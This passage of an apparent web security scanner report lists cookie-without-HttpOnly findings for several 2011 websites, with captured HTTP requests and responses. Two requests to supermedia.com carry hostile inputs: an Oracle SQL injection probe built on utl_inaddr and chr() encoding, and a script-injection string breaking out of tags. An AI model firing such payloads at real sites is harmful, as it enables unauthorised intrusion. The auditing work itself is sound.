Last-Modified: Fri, 21 Jan 2011 22:25:50 GMT
Content-Type: text/javascript
ntCoent-Length: 3501
Connection: close
Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139e45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 3501

function rotateBanner(ind)
{        
   if(ind < $(".image_thumb ul li").size()-1)
   {            
       ind++;            
   }
   else
   {
       ind = 0;            
   }
   $(".image_thumb ul li:eq("+ind+")").trigger('click');            
}
functi
...[SNIP]...

13.84. http://www.supermedia.com/spportal/style/cobrand.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.supermedia.com
Path:   /spportal/style/cobrand.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /spportal/style/cobrand.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.supermedia.com

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:10:03 GMT
Set-Cookie: JSESSIONID=731B1A9216D4A4C0F349F4440AF3B55F.app8-a1; Path=/
Set-Cookie: trafficSource=default; Expires=Sat, 05-Mar-2011 19:09:57 GMT; Path=/
Set-Cookie: CstrStatus=U; Expires=Sat, 05-Mar-2011 19:09:57 GMT; Path=/
ETag: W/"1858-1295648680000"
Last-Modified: Fri, 21 Jan 2011 22:24:40 GMT
Content-Type: text/css
Cteonnt-Length: 1858
Connection: close
Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139e45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 1858

/******************
* Cobrand Styles *
******************/

.switchboard-header-holder,
.verizon-header-holder
{
   background: white !important;
   border-width: 0px 1px 0px 1px;
   border-color
...[SNIP]...

13.85. http://www.supermedia.com/spportal/style/supermedia/extended-family.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.supermedia.com
Path:   /spportal/style/supermedia/extended-family.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /spportal/style/supermedia/extended-family.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.supermedia.com

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:10:02 GMT
Set-Cookie: JSESSIONID=A7746C820A831D141CF5F0907A735D33.app4-a1; Path=/
Set-Cookie: trafficSource=default; Expires=Sat, 05-Mar-2011 19:10:00 GMT; Path=/
Set-Cookie: CstrStatus=U; Expires=Sat, 05-Mar-2011 19:10:00 GMT; Path=/
ETag: W/"3205-1295648664000"
Last-Modified: Fri, 21 Jan 2011 22:24:24 GMT
Content-Type: text/css
Cteonnt-Length: 3205
Connection: close
Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 3205

#one_column_top_banner {no-repeat; height:306px; color:#4d4d4f;}
#one_column_top_banner .inner {padding:50px 0px 0px 54px}
#one_column_top_banner #banner_key_points {font-weight:bold; padding:0px 0p
...[SNIP]...

13.86. http://www.supermedia.com/spportal/style/supermedia/homepage.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.supermedia.com
Path:   /spportal/style/supermedia/homepage.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /spportal/style/supermedia/homepage.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.supermedia.com

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:10:02 GMT
Set-Cookie: JSESSIONID=E2CB327CED91C8DE1C5112A629EEBF60.app3-a1; Path=/
Set-Cookie: trafficSource=default; Expires=Sat, 05-Mar-2011 19:10:00 GMT; Path=/
Set-Cookie: CstrStatus=U; Expires=Sat, 05-Mar-2011 19:10:00 GMT; Path=/
ETag: W/"4639-1295648664000"
Last-Modified: Fri, 21 Jan 2011 22:24:24 GMT
Content-Type: text/css
Cteonnt-Length: 4639
Connection: close
Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 4639

.main_image {
   BACKGROUND: #333; HEIGHT: 300px;width:960px;overflow:hidden;text-align:left;margin-left:auto;margin-right:auto;position:relative;
}
.main_image div.subheader {
   FONT-WEIGHT: normal;
...[SNIP]...

13.87. http://www.supermedia.com/spportal/style/supermedia/supermedia.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.supermedia.com
Path:   /spportal/style/supermedia/supermedia.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /spportal/style/supermedia/supermedia.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.supermedia.com

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:10:00 GMT
Set-Cookie: JSESSIONID=A5BEFEA9E7FDE0851B758A201AE4DC7F.app8-a1; Path=/
Set-Cookie: trafficSource=default; Expires=Sat, 05-Mar-2011 19:09:58 GMT; Path=/
Set-Cookie: CstrStatus=U; Expires=Sat, 05-Mar-2011 19:09:58 GMT; Path=/
ETag: W/"20304-1295648664000"
Last-Modified: Fri, 21 Jan 2011 22:24:24 GMT
Content-Type: text/css
ntCoent-Length: 20304
Connection: close
Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a423660;path=/
Cache-Control: private
Content-Length: 20304

html,body
{
   margin: 0;
   padding: 0;
   background: #efefef;
   text-align: center;
}

div#popup-content
{
   background: #ffffff;
   height:100%;
}

body,td,th {font-family: Arial, Helvetica, s
...[SNIP]...

13.88. https://www.supermedia.com/spportal/spportalFlow.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gzip, deflate
Cookie: trafficSource=default; CstrStatus=U; JSESSIONID=288FFBAC45FB01B3489845E2C7FB3FFF.app3-a1; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139e45525d5f4f58455e445a4a42378b; s_cc=true; s_sq=%5B%5BB%5D%5D
Host: www.supermedia.com
Connection: Keep-Alive
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 04 Feb 2011 01:49:34 GMT
Set-Cookie: JSESSIONID=288FFBAC45FB01B3489845E2C7FB3FFF.app3-a1; Path=/; Secure
Set-Cookie: trafficSource=default; Expires=Sun, 06-Mar-2011 01:49:34 GMT; Path=/
Set-Cookie: CstrStatus=RVU; Expires=Sun, 06-Mar-2011 01:49:34 GMT; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 19973


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages
...[SNIP]...

13.89. https://www.supermedia.com/spportal/spportalFlow.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /spportal/spportalFlow.do?_flowExecutionKey=_c47FC5CD2-84B0-15BA-BBD6-7F2890FFCE5D_k1D7E1B65-A481-322E-8A3E-9052CB09A537%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x00029D)%3C%2Fscript%3E HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trafficSource="SP198c8\"; CstrStatus=U; campaign_track=BP%3AUpdate%20Your%20Profile%20Top

Response

HTTP/1.1 302 Moved Temporarily
Server: Unspecified
Date: Fri, 04 Feb 2011 01:45:19 GMT
Set-Cookie: JSESSIONID=CD1B75B428F192D4B130C351A3081BAE.app2-a1; Path=/; Secure
Set-Cookie: CstrStatus=RVU; Expires=Sun, 06-Mar-2011 01:45:19 GMT; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Location: https://www.supermedia.com/spportal/myaccount.do;jsessionid=CD1B75B428F192D4B130C351A3081BAE.app2-a1
Content-Language: en-US
Content-Length: 0
Connection: close
Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b;path=/


13.90. http://www.switchboard.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.switchboard.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.switchboard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Unspecified
Set-Cookie: JSESSIONID=2FABF569B30B4B4450F39F4DAF303551; Path=/
Set-Cookie: SWBD=1296761727329-www.switchboard.com-9308380-589736ZZ; Domain=.switchboard.com; Expires=Tue, 02-Feb-2016 19:35:27 GMT; Path=/
Set-Cookie: SWBD=1296761727329-www.switchboard.com-9308380-631301ZZ; Domain=.switchboard.com; Expires=Tue, 02-Feb-2016 19:35:27 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Content-Length: 14856
Date: Thu, 03 Feb 2011 19:35:27 GMT
Connection: close
Set-Cookie: NSC_xxx-txjudicpbse-dpn-80-VOJY=ffffffff948202af45525d5f4f58455e445a4a421502;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...

13.91. http://www.tucows.com/preview/194850/x22  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tucows.com
Path:   /preview/194850/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /preview/194850/x22 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:30:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4d4da9e3d2f2d2155bae3a5364759dbf; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 09 Sep 2009 11:33:11 -0400
Set-Cookie: 4d4da9e3d2f2d2155bae3a5364759dbf=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 74939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Download SmartDraw
...[SNIP]...

13.92. http://www.veoh.com/rest/v2/execute.xml  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /rest/v2/execute.xml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rest/v2/execute.xml?apiKey=5697781E-1C60-663B-FFD8-9B49D2B56D36&method=veoh.video.findByPermalink&permalink=v18978294NGnK88j8& HTTP/1.1
Host: www.veoh.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utmv=; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.1.10.1296766388; vvt="1&Fri, 04 Feb 2011 20:53:09 GMT"; __qca=P0-1750536792-1296766390251; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
X-HOST: appsrv-api15.els1.veoh.com
Set-Cookie: JSESSIONID=FA513D5C45F8F3409631CA9302C4270B; Path=/
Content-Type: text/xml;charset=utf-8
Content-Language: en-US
Content-Length: 5142
Date: Thu, 03 Feb 2011 20:52:31 GMT

<?xml version="1.0" encoding="UTF-8" ?>


<rsp stat="ok" guid="fa50489b-0120-4bd5-943a-f22f1284d848" echo="" requestGeo="US" timestamp="1296766351">
   
   
                                   
...[SNIP]...

13.93. http://www.veoh.com/webplayed.xml  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /webplayed.xml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webplayed.xml?action=PlayerLoaded&videoSequence=1&userWhoEmbedded=anonymous&playSequence=0&collectionId=&autoPlay=true&percent=&playerVersion=flash/VeohPlayer-Freewheel.7.0.0.40&player=videodetails&inVeoh=true&flashVersion=WIN%2010,1,103,20&affiliateId=&cachebuster=0.22769851004704833&apiId=0E13378F-874E-DB67-3E0B-113A55BC57F9&positionTime=0&volumeLevel=NaN&totalVideos=1&truncated=false&videoId=18978294&idSource=veoh&bufferStateEntered=0&userTime=2.565&playTime=0&bufferTime=0&stopTime=2.565&pauseTime=0&playerSessionID=e5df0bf7-4865-174d-7ab5-b481ea4a57e3&client=false HTTP/1.1
Host: www.veoh.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utmv=; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.1.10.1296766388; vvt="1&Fri, 04 Feb 2011 20:53:09 GMT"; __qca=P0-1750536792-1296766390251; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; JSESSIONID=FA513D5C45F8F3409631CA9302C4270B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-HOST: appsrv-api16.els1.veoh.com
Set-Cookie: veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; Domain=.veoh.com; Path=/
Content-Type: text/xml;charset=utf-8
Content-Language: en-US
Content-Length: 94
Date: Thu, 03 Feb 2011 20:52:32 GMT


<Response>
   <Result>0</Result>
   <ErrorText></ErrorText>
</Response>

13.94. http://www.waspbarcode.com/scanners/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.waspbarcode.com
Path:   /scanners/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /scanners/ HTTP/1.1
Host: www.waspbarcode.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 20:34:56 GMT
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "administrator@waspbarcode.com" on "2007.06.04T10:29-0500" exp "2011.06.04T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "administrator@waspbarcode.com" on "2007.06.04T10:29-0500" exp "2011.06.04T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "administrator@waspbarcode.com" on "2007.06.04T10:29-0500" exp "2011.06.04T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "administrator@waspbarcode.com" on "2007.06.04T10:29-0500" exp "2011.06.04T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "administrator@waspbarcode.com" on "2007.06.04T10:29-0500" exp "2011.06.04T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "administrator@waspbarcode.com" on "2007.06.04T10:29-0500" exp "2011.06.04T12:00-0500" r (l 0 s 0 v 0 o 0))
X-Powered-By: ASP.NET
Content-Length: 60930
Content-Type: text/html
Set-Cookie: Pop=Set=True; expires=Fri, 04-Feb-2011 20:34:56 GMT; path=/
Set-Cookie: WASP=firsttime=true&source=&originalid=411392716&sessionid=411392716; expires=Fri, 03-Feb-2012 20:34:56 GMT; path=/
Set-Cookie: ASPSESSIONIDCQBSCDRC=MMKFFIIBGDMFFEBNGPKMKPJL; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml">

   <head>
       <title>Barcode Scanners - Laser &amp; Wireless by Wasp Barcode Technologies</
...[SNIP]...

13.95. http://www.wugnet.com/shareware/spow.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.wugnet.com
Path:   /shareware/spow.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shareware/spow.asp HTTP/1.1
Host: www.wugnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 20:36:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 27
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQSBTTD=KPNKCKPAPFNMPLDOKMGFDEND; path=/
Cache-control: private

<a href='/'>WUGNET Home</a>

13.96. http://102.xg4ken.com/media/redir.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://102.xg4ken.com
Path:   /media/redir.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/redir.php?prof=88&camp=4679&affcode=cr197235&cid=7085856551|166328|SmartDraw&mType=e&networkType=search&url[]=http%3A%2F%2Finfo.mindjet.com%2FMindManagerB.html%3Fcmpg%3DAmericas_-_Google_US_Competitors/x22 HTTP/1.1
Host: 102.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 20:31:19 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=6de8bdeb-6bd9-2909-a31c-000018710444; expires=Wed, 04-May-2011 20:31:19 GMT; path=/; domain=.xg4ken.com
Location: http://info.mindjet.com/MindManagerB.html?cmpg=Americas_-_Google_US_Competitors/x22
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


13.97. http://2e76.v.fwmrm.net/ad/l/1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://2e76.v.fwmrm.net
Path:   /ad/l/1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ad/l/1?metr=127&ct=5&et=i&cn=firstQuartile&s=c110&t=129676725240202813&adid=249349&reid=123864&arid=0&iw=&uxnw=11894&uxss=sg11948&uxct=1 HTTP/1.1
Host: 2e76.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _cph="1295039779.438.1.1,"; _cvr="1296076529^11575^sg11951~sg11611^0~0^2206.000000~0.000000,"; _pr="1296076540.8163.209169~209170~,1296076434.7120.209169~209170~,1296076334.4450.209169~209170~,1296076263.3972.209169~209170~,1296076138.3959.209169~209170~,1296076027.4830.209169~209170~,1296075922.4171.209169~209170~,1296075822.3611.209169~209170~,1296075754.4614.209169~209170~,1296075621.9008.209169~209170~,1296075510.8419.209169~209170~,1296075405.9586.209169~209170~,1296075304.8942.209169~209170~,1296075235.1965.209169~209170~,1296075101.798.209169~209170~,1296074990.1228.209169~209170~,1296074859.104.209169~209170~,1296074758.1162.209169~209170~,1296074642.5926.209169~209170~,1296074515.1669.209169~209170~,1296074405.2652.209169~209170~,1296074299.7276.209169~209170~,1296074199.8486.209169~209170~,1296074130.5588.209169~209170~,1296074005.5439.209169~209170~,1296073893.9848.209169~209170~,1296073785.9641.209169~209170~,1296073682.7603.209169~209170~,1296073611.6354.209169~209170~,1296073486.2138.209169~209170~,1296073374.8594.209169~209170~,1296073267.5235.209169~209170~,1296073166.3153.209169~209170~,1296073098.1567.209169~209170~,1296072968.5610.209169~209170~,"; NSC_okcbewjq1.gxnsn.ofu=ffffffff09091c3945525d5f4f58455e445a4a423209; _sid="c110_5569572937864193463"; _uid="a104_5562153497824379009"; _auv="g12288~1.1296767255.0,12720.1296767255.0,^"; _vr="1296767252.0+7564699552021921.248599~249349~331220~,"; _sc="sg12288.1296767252.1296767255.28800.0.0,"; _wr="g12288"

Response

HTTP/1.1 200 OK
Set-Cookie: _uid="a104_5562153497824379009";expires=Fri, 03 Feb 2012 21:07:44 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _auv="g12288~1.1296767264.0,12720.1296767264.0,^";expires=Sat, 05 Mar 2011 21:07:44 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _cvr="1296767264^11894^sg12288~sg11948^0~0^0.000000~5.000000,";expires=Sat, 05 Mar 2011 21:07:44 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _vr="1296767252.0+7564699552021921.248599~249349~331220~,";expires=Sat, 05 Mar 2011 21:07:44 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg12288.1296767252.1296767264.28800.0.5,";expires=Sat, 05 Mar 2011 21:07:44 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g12288";expires=Sat, 05 Mar 2011 21:07:44 GMT;domain=.fwmrm.net;path=/;
Content-Type: text/html
Content-Length: 0
Pragma: no-cache
Date: Thu, 03 Feb 2011 21:07:43 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"


13.98. http://2e76.v.fwmrm.net/ad/p/1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://2e76.v.fwmrm.net
Path:   /ad/p/1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /ad/p/1? HTTP/1.1
Host: 2e76.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
content-type: text/xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
